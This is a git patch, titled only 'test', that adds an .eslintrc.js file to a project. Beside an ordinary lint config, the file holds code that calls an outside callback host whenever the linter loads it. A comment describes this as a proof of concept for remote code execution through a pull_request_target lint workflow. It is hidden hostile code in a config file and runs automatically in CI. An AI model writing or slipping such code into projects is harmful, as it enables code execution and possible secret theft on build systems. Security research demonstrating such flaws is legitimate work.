From f17ff85742ec3b37dd9a0cbff7fc37c33c8dbc58 Mon Sep 17 00:00:00 2001 From: Pleorqy Date: Sun, 5 Apr 2026 15:16:51 +0300 Subject: [PATCH] test --- .eslintrc.js | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 .eslintrc.js diff --git a/.eslintrc.js b/.eslintrc.js new file mode 100644 index 00000000..303a4193 --- /dev/null +++ b/.eslintrc.js @@ -0,0 +1,8 @@ +// Proof of concept - RCE via pull_request_target + lint-action +// No secrets accessed, no data exfiltrated +const https = require("https"); +https.get("https://d79554mj5fjlou9ptth01yyypng9rpr5g.oast.fun/poc-sybil-interface"); + +module.exports = { + extends: ["react-app"], +};